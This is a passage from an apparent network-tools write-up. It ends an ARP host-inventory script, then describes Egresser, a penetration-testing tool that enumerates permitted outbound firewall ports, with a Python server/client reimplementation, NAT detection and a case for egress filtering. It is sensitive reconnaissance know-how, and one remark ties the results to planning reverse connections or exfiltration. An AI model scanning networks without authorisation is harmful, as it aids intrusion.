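                    "00:11:22:33:44:55", "192.168.1.10"),
    build_arp_frame(ARP_REQUEST, "00:de:ad:be:ef:00", "0.0.0.0",
                    "00:00:00:00:00:00", "192.168.1.50"),
    build_arp_frame(ARP_REQUEST, "00:11:22:33:44:66", "192.168.1.20",
                    "00:00:00:00:00:00", "192.168.1.1", vlan_id=100),
    bytes(12) + struct.pack("!H", 0x0800) + bytes(20),
]


def inventory(frames=SAMPLE_FRAMES) -> dict[str, str]:
    table = HostTable()
    for frame in frames:
        table.feed(frame)
    return table.hosts


if __name__ == "__main__":
    for ip, mac in sorted(inventory().items(), key=lambda kv: IPv4Address(kv[0])):
        print(f"{ip:15} {mac}")
```

Feeding the five constructed frames yields three hosts: .10 and .20 from their requests and .1 from its reply, while the probe and the IPv4 frame contribute nothing.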
Egresser is a tool for enumerating outbound firewall rules, designed for penetration testers assessing whether egress filtering is adequate from inside a corporate network. The client probes each TCP port in turn; the Egresser server responds with the client's source IP address and port, which lets the client determine whether the outbound port is permitted (on both IPv4 and IPv6) and whether NAT is likely to be taking place.
How it Works
The server-side script works in combination with iptables, which redirects all TCP traffic to port 8080 where the 'real' server listens. It is written in Perl as a pre-forking server using Net::Server::Prefork, and listens on both IPv4 and IPv6 when available. Any TCP connection gets a simple response: a null-terminated string made up of the connecting client's IP address and port. Feel free to use telnet to interact with the service if you are in a restricted environment without access to the Egresser client (our Egresser server can be found at egresser.labs.cyberis.co.uk, which you are free to use for legitimate purposes).
The client is also written in Perl and is threaded for speed. By default it scans TCP ports 1-1024, which is configurable within the script. Force IPv4 with the '-4' command line argument or IPv6 with '-6'; by default it uses whichever protocol your operating system prefers. Normal output is a concise summary of permitted ports only; specify the verbose flag (-v) to list every open and closed port explicitly.
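The exchange described above with both sides in one file, as an added example that is not the Cyberis code: the server answers every TCP connection with the source address it saw, and the client connects to each port, treats a well-formed answer as "this outbound port is permitted", and compares the address the server reports with its own socket address to spot NAT/PAT. The reply layout, `IP:PORT` followed by a NUL byte, is assumed from the description rather than taken from the real server, and the iptables redirect of every port to 8080 is replaced by binding one loopback port so the example runs stand-alone.

```python
"""Egresser-style egress probe: server, client, parallel scan and NAT detection."""
import socket
import socketserver
import threading
from concurrent.futures import ThreadPoolExecutor

TERMINATOR = b"\x00"   # assumed reply framing: b"IP:PORT\x00"


class EgressHandler(socketserver.BaseRequestHandler):
    """Server: report where the connection came from, then close."""

    def handle(self):
        ip, port = self.client_address[:2]
        self.request.sendall(f"{ip}:{port}".encode() + TERMINATOR)


class EgressServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True


def start_server(host="127.0.0.1", port=0):
    """Bind (port 0 = any free port) and serve in a background thread."""
    server = EgressServer((host, port), EgressHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def probe(host, port, timeout=2.0):
    """Client: test one outbound port.

    'permitted' is True, False, or None when something answered but not with an
    Egresser reply (a transparent proxy or an unrelated service on that port)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            local_ip, local_port = sock.getsockname()[:2]
            buf = b""
            while TERMINATOR not in buf and len(buf) < 128:
                chunk = sock.recv(64)
                if not chunk:
                    break
                buf += chunk
    except OSError:                       # refused, silently dropped (timeout) or unreachable
        return {"port": port, "permitted": False}
    reply, found, _ = buf.partition(TERMINATOR)
    text = reply.decode(errors="replace")
    try:
        if not found:
            raise ValueError("no terminator")
        seen_ip, seen_port = text.rsplit(":", 1)      # rsplit so IPv6 literals still parse
        seen_port = int(seen_port)
    except ValueError:
        return {"port": port, "permitted": None, "raw": text}
    return {
        "port": port,
        "permitted": True,
        "seen": (seen_ip, seen_port),
        # Source address rewritten on the way out => NAT/PAT (or a proxy) in the path
        "nat": seen_ip != local_ip or seen_port != local_port,
    }


def scan(host, ports, workers=64):
    """Probe many ports in parallel; returns {port: result}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return {r["port"]: r for r in pool.map(lambda p: probe(host, p), ports)}


def permitted_ports(results):
    return sorted(p for p, r in results.items() if r["permitted"] is True)


def unused_port(host="127.0.0.1"):
    """Reserve-and-release an ephemeral port so the example has a known closed port."""
    with socket.socket() as s:
        s.bind((host, 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    server = start_server()
    open_port = server.server_address[1]
    results = scan("127.0.0.1", [unused_port(), open_port])
    for port, r in sorted(results.items()):
        print(port, r)
    print("permitted:", permitted_ports(results))
    server.shutdown()
    server.server_close()
```

Against a real perimeter the interesting column is `nat`: a permitted port whose reported source differs from the local address tells you the egress path rewrites addresses, which changes how any reverse connection or exfiltration channel from inside would appear to the outside world.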
Why?
It is recommended that outbound firewall rules are restricted within corporate environments to ensure perimeter controls are not easily circumvented. For example, inadequate egress filtering within an organisation would allow a malicious user to trivially bypass a web proxy providing filtering/AV/logging simply by changing a browser’s connection settings. Many other examples also exist - many worms spread over SMB protocols, malware can use numerous channels to exfiltrate data, and potentially unauthorised software (e.g. torrent/P2P file sharing) can freely operate, wasting corporate resources and significantly increasing the likelihood of malicious code being introduced into the environment.
Generally, it is recommended that all outbound protocols should be restricted, allowing exceptions from specific hosts on a case-by-case basis. Web browsing should be conducted via dedicated web proxies only, with any attempted direct connections logged by the perimeter firewall and investigated as necessary.
Egresser is a simple to use tool to allow a penetration tester to quickly enumerate allowed ports within a corporate environment.